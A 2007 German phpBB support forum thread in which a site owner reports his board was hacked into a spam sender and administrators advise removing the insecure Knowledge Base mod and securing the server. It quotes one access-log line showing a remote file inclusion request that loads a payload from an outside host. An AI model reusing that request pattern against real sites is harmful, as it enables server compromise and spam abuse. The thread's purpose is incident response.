Board gehackt - Spamversender

Sicherheit den Webservers, Servers und rund um das phpBB
Gesperrt
Benutzeravatar
shadowrider
User
User
Beiträge: 493
Registriert: Mi 18.Aug, 2004 11:56
Wohnort: Schelklingen-Schmiechen
Kontaktdaten:

Board gehackt - Spamversender

Beitrag von shadowrider » Mi 20.Jun, 2007 08:49

mein Board wurde gehackt und als Spamversender missbraucht.
Hier mal der Auszug aus dem Log:

Code: Alles auswählen

www.oldtimerfreunde-schmiechen.de***81.199.55.198 - - [20/Jun/2007:06:56:03 +0200] "POST /forum/includes/kb_constants.php?module_root_path=http://deveka.biz/tmp/dave.txt? HTTP/1.1" 200 269657 "http://www.oldtimerfreunde-schmiechen.de/forum/includes/kb_constants.php?module_root_path=http://deveka.biz/tmp/dave.txt?"
habe erst mal die kb_constants.php und eine vom Provider empfohlene htaccess eingebaut.

Der CT hatte anscheinend nichts zu beanstanden

was kann ich tun, um sowas in Zukunft zu verhindern?

Benutzeravatar
AmigaLink
Moderator
Moderator
Beiträge: 6211
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink » Mi 20.Jun, 2007 09:08

Da kann man mal wieder sehen wie unsicher die KB ist. ^6
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29108
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Mi 20.Jun, 2007 10:16

Da kann man mal wieder sehen wie unsicher die KB ist.
Daher flog die bei Zeiten bei mir auch raus.

@shadowrider
Bau die am besten aus, dann hast Du weniger Ärger.
Ich habe für den Ersatz bei mir auch ein "normales" Forum hergenommen, in dem die Rechte dann entsprechend vergeben sind.
Funktioniert auch und ist deutlich sicherer...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
shadowrider
User
User
Beiträge: 493
Registriert: Mi 18.Aug, 2004 11:56
Wohnort: Schelklingen-Schmiechen
Kontaktdaten:

Beitrag von shadowrider » Mi 20.Jun, 2007 15:12

in meinem Root habe ich eine Datei namens mas.php gefunden, ich hänge die mal als zip an, vieleicht kennt jemand sowas, ich glaube die gehört auch zur Spamfunktion?

Fragen über Fragen:

weshalb kann jemand in meinem Root eine Datei anlegen?

muss ich noch mit weiteren Dateien in Unterverzeichnissen rechnen? wenn ja, wie finde bzw. identifiziere ich die?

Nachtrag:
obwohl im Log die kb_conctants.php als Verursacher aufgeführt ist, konnte ich keinerlei Änderung an dieser Datei feststellen - was soll mir das jetzt sagen?

[ Attachment gelöscht am Mi 20.Jun, 2007 17:08 von oxpus ]
Zuletzt geändert von shadowrider am Mi 20.Jun, 2007 15:26, insgesamt 1-mal geändert.

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29108
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Mi 20.Jun, 2007 16:08

Jo, ein kleiner netter Emailer, der auch gleich alle anderen Server-Daten mitliefert. Ich habe den aus Sicherheitsgründen aber nun gelöscht.
Löschen und die KB zunächst einmal deinstallieren, bzw. den Server abdichten.

Man muss auch nicht eine PHP-Datei verändern, um Dateien auf dem Server abzulegen.
Im Root ist es dann auch für den Angreifer am einfachsten, da er sich dann nicht um Pfade kümmert.

Wie bereits geschrieben: Die KB ist alles andere als sicher und selbst mit unzähligen Fixen, die AmigaLink auf seiner Seite veröffentlicht hat, gibt es sicher noch unzählige weitere Lücken.
Ich würde die wirklich schnellstens ausbauen, alles sichern, alle (und ich meine wirklich ALLE) Passwörter ändern, die mit dem Server und den darauf gehosteten Programmen verbunden sind und erst, wenn keinen weiteren Lücken und Schäden sichtbar sind, wieder den Server ausmachen (.htaccess mit einer Umleitung oder Passwortabfrage für Debuggings würde da zum Anfang reichen).

[color=red]Kleiner Hinweis an dieser Stelle:
Dieser Emailer verwendet 2 aktive und eine "Schein"-Email Adresse. Diese wären
cladoang<at>yahoo.com
a3sgcs.<at>lokinmr
snak3r<at>gmail.com
Ich empfehle dringend, diese 3 Strassen umgehend zu bannen und nach Usern ausschau halten, die eine dieser 3 Email-Adressen verwenden![/color]
Zuletzt geändert von oxpus am Mi 20.Jun, 2007 16:22, insgesamt 2-mal geändert.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Benutzeravatar
shadowrider
User
User
Beiträge: 493
Registriert: Mi 18.Aug, 2004 11:56
Wohnort: Schelklingen-Schmiechen
Kontaktdaten:

Beitrag von shadowrider » Mi 20.Jun, 2007 17:12

wieder den Server ausmachen (.htaccess mit einer Umleitung oder Passwortabfrage für Debuggings würde da zum Anfang reichen).
den Teil habe ich nicht so recht verstanden, wäre nett wenn du hierzu genauer was sagen würdest

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29108
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Do 21.Jun, 2007 09:38

Einen Passwortschutz kannst Du mit einem guten FTP-Client oder des Control Panel zu Deinem Webserver einrichten.
Dabei wird eine .htaccess im Root abgelegt, die dann ein Passwort zum Betreten der Domain verlangt.
Das ist am einfachsten...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Gesperrt